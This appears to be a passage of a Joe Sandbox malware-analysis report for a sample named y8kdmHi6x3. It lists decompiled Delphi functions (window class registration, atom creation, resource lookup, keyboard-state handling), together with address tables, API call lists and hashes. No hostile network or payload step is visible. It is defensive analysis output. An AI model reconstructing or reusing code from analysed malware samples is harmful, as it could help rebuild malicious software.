                                                    0x0044656a
                                                    0x0044656f
                                                    0x00446572
                                                    0x00446575
                                                    0x0044657c
                                                    0x0044658c
                                                    0x0044658c
                                                    0x00446593
                                                    0x00446598
                                                    0x0044659d
                                                    0x004465a2
                                                    0x004465a7
                                                    0x004465ac
                                                    0x004465b2
                                                    0x004465b7
                                                    0x004465bc
                                                    0x004465c2
                                                    0x004465c7
                                                    0x004465cc
                                                    0x004465d2
                                                    0x004465d7
                                                    0x004465d7
                                                    0x004465de
                                                    0x004465e1
                                                    0x004465e4
                                                    0x004465e9

                                                    APIs
                                                    • GetVersion.KERNEL32(00000000,004465EA), ref: 0044657E
                                                      • Part of subcall function 00446330: GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                      • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 00446384
                                                      • Part of subcall function 00446330: GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                      • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                      • Part of subcall function 00446330: RegisterClipboardFormatA.USER32 ref: 004463EB
                                                      • Part of subcall function 00446330: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                      • Part of subcall function 00446330: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                    • String ID: @fD
                                                    • API String ID: 3775504709-3452771706
                                                    • Opcode ID: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                    • Instruction ID: a2d0d9fa5674fa572cfd9e012cd62e1639ea6f2d0861d92eee2e079839ffb759
                                                    • Opcode Fuzzy Hash: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                    • Instruction Fuzzy Hash: FBF04F78214241AFE305FF2AFC5291937A4FB86314792947AF400436A6CA3CA851CB0E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043C1FC Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x49dbcc; // 0x49ebb8
								E0045B21C( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return L00403DE8(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x49eb18; // 0x0
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x49eb18; // 0x0
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x49eb18; // 0x0
								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = L00451924( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return L00403DE8(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = L004519E0(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = L004519E0(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}























                                                    0x0043c208
                                                    0x0043c20a
                                                    0x0043c210
                                                    0x0043c248
                                                    0x0043c248
                                                    0x0043c24f
                                                    0x0043c288
                                                    0x0043c28a
                                                    0x0043c28f
                                                    0x0043c367
                                                    0x0043c367
                                                    0x0043c36c
                                                    0x0043c379
                                                    0x0043c379
                                                    0x0043c37e
                                                    0x00000000
                                                    0x0043c384
                                                    0x0043c295
                                                    0x0043c29a
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c2a0
                                                    0x0043c2a4
                                                    0x0043c2ba
                                                    0x0043c2bc
                                                    0x0043c2bc
                                                    0x0043c2c1
                                                    0x0043c2ce
                                                    0x0043c2d0
                                                    0x0043c2d9
                                                    0x00000000
                                                    0x0043c2d9
                                                    0x0043c2c3
                                                    0x0043c2c3
                                                    0x0043c2c4
                                                    0x0043c2e3
                                                    0x0043c2e3
                                                    0x0043c2e7
                                                    0x0043c2f9
                                                    0x00000000
                                                    0x0043c2f9
                                                    0x00000000
                                                    0x0043c2ef
                                                    0x0043c2c6
                                                    0x0043c2c6
                                                    0x0043c2c7
                                                    0x0043c300
                                                    0x00000000
                                                    0x0043c300
                                                    0x0043c2c9
                                                    0x0043c2ca
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c307
                                                    0x0043c30c
                                                    0x0043c310
                                                    0x00000000
                                                    0x0043c312
                                                    0x0043c312
                                                    0x0043c317
                                                    0x0043c31b
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c31f
                                                    0x0043c325
                                                    0x0043c328
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c331
                                                    0x0043c338
                                                    0x0043c346
                                                    0x0043c34d
                                                    0x0043c354
                                                    0x00000000
                                                    0x0043c360
                                                    0x00000000
                                                    0x0043c310
                                                    0x0043c2a6
                                                    0x0043c2a6
                                                    0x0043c2ab
                                                    0x0043c2b7
                                                    0x0043c2b7
                                                    0x0043c2b7
                                                    0x00000000
                                                    0x0043c2b7
                                                    0x0043c2ad
                                                    0x0043c2ad
                                                    0x0043c2b0
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c2b2
                                                    0x0043c2b5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c2b5
                                                    0x0043c25f
                                                    0x0043c266
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c275
                                                    0x0043c27d
                                                    0x00000000
                                                    0x0043c283
                                                    0x0043c212
                                                    0x0043c219
                                                    0x0043c220
                                                    0x00000000
                                                    0x0043c22e
                                                    0x0043c23d
                                                    0x0043c242
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c242
                                                    0x0043c220
                                                    0x0043c38d

                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0043C331
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardState
                                                    • String ID:
                                                    • API String ID: 1724228437-0
                                                    • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                    • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
                                                    • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                    • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004747D8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 39%
                                                    			E004747D8(char __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				void* __ecx;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				struct HRSRC__* _t13;
				void* _t29;
				intOrPtr* _t33;
				struct HINSTANCE__* _t37;
				void* _t38;
				intOrPtr _t41;
				void* _t48;
				intOrPtr _t51;

				_t48 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t51);
				_push(0x474878);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_t11 = E00404E80(_v8);
				_t12 =  *0x49e668; // 0x400000
				_t13 = FindResourceA(_t12, _t11, 0xa); // executed
				if(_t13 == 0) {
					E00404A14(_t48, 0x47488c);
				} else {
					_t37 =  *0x49e668; // 0x400000
					_t33 = E0041E0D0(_t37, 1, 0xa, _v8);
					E0040500C(_t48,  *((intOrPtr*)( *_t33))());
					_push( *((intOrPtr*)( *_t33))());
					_t29 = E00404ED8(_t48);
					_pop(_t38);
					L0041D8CC(_t33, _t38, _t29);
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(0x47487f);
				return E004049C0( &_v8);
			}















                                                    0x004747de
                                                    0x004747e0
                                                    0x004747e6
                                                    0x004747ed
                                                    0x004747ee
                                                    0x004747f3
                                                    0x004747f6
                                                    0x004747fe
                                                    0x00474804
                                                    0x0047480a
                                                    0x00474811
                                                    0x0047485d
                                                    0x00474813
                                                    0x00474819
                                                    0x0047482b
                                                    0x00474837
                                                    0x00474842
                                                    0x00474845
                                                    0x0047484e
                                                    0x0047484f
                                                    0x0047484f
                                                    0x00474864
                                                    0x00474867
                                                    0x0047486a
                                                    0x00474877

                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0047480A
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindResource
                                                    • String ID:
                                                    • API String ID: 1635176832-0
                                                    • Opcode ID: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                    • Instruction ID: 3aff7a426593e0292f2699da8adb463acbb462f0eeeb319a78e6b77317a5089b
                                                    • Opcode Fuzzy Hash: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                    • Instruction Fuzzy Hash: 7B117074700204AFD300FBAADC5296AB3EDFB89714B51807AF508E7291DB39DD01875A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004598AC Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E004598AC(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00407540(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                                    0x004598b8
                                                    0x004598c2
                                                    0x004598cb
                                                    0x004598d2
                                                    0x004598d5
                                                    0x004598d6
                                                    0x004598e1
                                                    0x004598e5

                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004598D6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                    • Instruction ID: 5377867823ed044e1de45f701f66450d20e8ba5618c1584b6e86b1986842862f
                                                    • Opcode Fuzzy Hash: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                    • Instruction Fuzzy Hash: E6F0C579605608AFCB40DF9DC588D8AFBE8BB4C264B159195B988CB721D234FD808F90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004593B4 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 42%
                                                    			E004593B4(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x459555);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x45955c);
					return E004049C0( &_v48);
				}
				_t22 =  *0x49dc84; // 0x49e04c
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E00422BCC(E00459934, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x49bf54 = L00407540;
				_t26 =  *0x49bf74; // 0x45909c
				_t27 =  *0x49e668; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x49e668; // 0x400000
					 *0x49bf60 = _t62;
					_t88 = RegisterClassA(0x49bf50);
					if(_t88 == 0) {
						_t64 =  *0x49d7fc; // 0x422f20
						E00406A70(_t64,  &_v48);
						E0040D144(_v48, 1);
						E00404378();
					}
				}
				_t29 =  *0x49d970; // 0x49e900
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x49d970; // 0x49e900
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x49e668; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x96000045
				_t39 = E00404E80( *_t7);
				_t40 =  *0x49bf74; // 0x45909c, executed
				_t41 = E00407AE4(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x45150c
				E004049C0(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10940000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x49da40; // 0x49eb1c
				if( *_t47 != 0) {
					_t55 = E0045A038(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E0045A038(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x49da40; // 0x49eb1c
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}




























                                                    0x004593bd
                                                    0x004593c0
                                                    0x004593c4
                                                    0x004593c5
                                                    0x004593ca
                                                    0x004593cd
                                                    0x004593d7
                                                    0x0045953f
                                                    0x00459541
                                                    0x00459544
                                                    0x00459547
                                                    0x00459554
                                                    0x00459554
                                                    0x004593dd
                                                    0x004593e5
                                                    0x00000000
                                                    0x00000000
                                                    0x004593f1
                                                    0x004593f6
                                                    0x004593fe
                                                    0x00459407
                                                    0x0045940d
                                                    0x0045941a
                                                    0x0045941c
                                                    0x00459421
                                                    0x00459430
                                                    0x00459433
                                                    0x00459438
                                                    0x0045943d
                                                    0x0045944c
                                                    0x00459451
                                                    0x00459451
                                                    0x00459433
                                                    0x00459458
                                                    0x00459461
                                                    0x00459463
                                                    0x00459465
                                                    0x00459465
                                                    0x0045946b
                                                    0x00459474
                                                    0x00459476
                                                    0x00459478
                                                    0x00459478
                                                    0x0045947b
                                                    0x0045947c
                                                    0x0045947e
                                                    0x00459480
                                                    0x00459482
                                                    0x00459484
                                                    0x00459489
                                                    0x0045948a
                                                    0x0045948c
                                                    0x00459492
                                                    0x0045949e
                                                    0x004594a3
                                                    0x004594a8
                                                    0x004594ab
                                                    0x004594b1
                                                    0x004594b6
                                                    0x004594bd
                                                    0x004594c3
                                                    0x004594c7
                                                    0x004594cc
                                                    0x004594d4
                                                    0x004594d8
                                                    0x004594e5
                                                    0x004594e9
                                                    0x004594f0
                                                    0x004594f8
                                                    0x004594fc
                                                    0x004594fc
                                                    0x00459503
                                                    0x0045950c
                                                    0x00459516
                                                    0x00459523
                                                    0x00459528
                                                    0x00459530
                                                    0x0045953a
                                                    0x0045953a
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00422BCC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                    • GetClassInfoA.USER32 ref: 00459413
                                                    • RegisterClassA.USER32 ref: 0045942B
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 004594C7
                                                    • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 004594E9
                                                    • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00451480), ref: 004594FC
                                                    • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459507
                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459516
                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459523
                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 0045953A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                    • String ID: /B$@u@$LI
                                                    • API String ID: 2103932818-2136969242
                                                    • Opcode ID: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                    • Instruction ID: fa4c447954f7109e74da3f6b40bcdb174dc852a7bebec26a65c914fdd247333a
                                                    • Opcode Fuzzy Hash: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                    • Instruction Fuzzy Hash: 594163B1A44204AFE711EF79DD82F663798AB55704F504576FD00EB2E3DA78AC048B6C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446330 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103registrylibraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 86%
                                                    			E00446330(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				short _t27;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x4464a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404A14(0x49eb28, _v8);
				_t25 =  *0x49eb28; // 0x0
				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
				 *0x49eb24 = _t27;
				_t29 =  *0x49e668; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404A14(0x49eb2c, _v20);
				_t35 =  *0x49eb2c; // 0x0
				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
				_t38 =  *0x49eb2c; // 0x0
				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
				 *0x49eb68 = E0041AF14(1);
				L00445F34();
				 *0x49eb18 = L00445D5C(1, 1);
				_t47 = E00457FC8(1, __edi);
				_t78 =  *0x49de0c; // 0x49ebbc
				 *_t78 = _t47;
				_t49 = E004590AC(0, 1);
				_t80 =  *0x49dbcc; // 0x49ebb8
				 *_t80 = _t49;
				_t50 =  *0x49dbcc; // 0x49ebb8
				E0045AD24( *_t50, 1);
				_t53 =  *0x435da8; // 0x435dac
				E0041A634(_t53, 0x43807c, 0x43808c);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x4464af);
				E004049C0( &_v20);
				return E004049C0( &_v8);
			}

























                                                    0x00446339
                                                    0x0044633c
                                                    0x00446341
                                                    0x00446342
                                                    0x00446347
                                                    0x0044634a
                                                    0x00446356
                                                    0x00446359
                                                    0x00446367
                                                    0x00446374
                                                    0x00446379
                                                    0x00446384
                                                    0x00446389
                                                    0x00446393
                                                    0x00446398
                                                    0x0044639b
                                                    0x004463a4
                                                    0x004463a7
                                                    0x004463b8
                                                    0x004463c5
                                                    0x004463ca
                                                    0x004463da
                                                    0x004463e0
                                                    0x004463f0
                                                    0x00446401
                                                    0x00446406
                                                    0x00446417
                                                    0x00446425
                                                    0x0044642a
                                                    0x00446430
                                                    0x0044643b
                                                    0x00446440
                                                    0x00446446
                                                    0x00446448
                                                    0x00446451
                                                    0x00446460
                                                    0x00446465
                                                    0x00446474
                                                    0x00446478
                                                    0x00446485
                                                    0x00446485
                                                    0x0044648c
                                                    0x0044648f
                                                    0x00446492
                                                    0x0044649a
                                                    0x004464a7

                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                    • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                    • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                    • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                    • RegisterClipboardFormatA.USER32 ref: 004463EB
                                                      • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                      • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                      • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                      • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                      • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                      • Part of subcall function 00457FC8: GetKeyboardLayout.USER32 ref: 0045800D
                                                      • Part of subcall function 00457FC8: GetDC.USER32(00000000), ref: 00458062
                                                      • Part of subcall function 00457FC8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045806C
                                                      • Part of subcall function 00457FC8: ReleaseDC.USER32 ref: 00458077
                                                      • Part of subcall function 004590AC: LoadIconA.USER32 ref: 00459191
                                                      • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                      • Part of subcall function 004590AC: OemToCharA.USER32 ref: 004591D6
                                                      • Part of subcall function 004590AC: CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000), ref: 00459216
                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterReleaseSectionThread
                                                    • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                    • API String ID: 2984857458-974380857
                                                    • Opcode ID: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                    • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                    • Opcode Fuzzy Hash: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                    • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

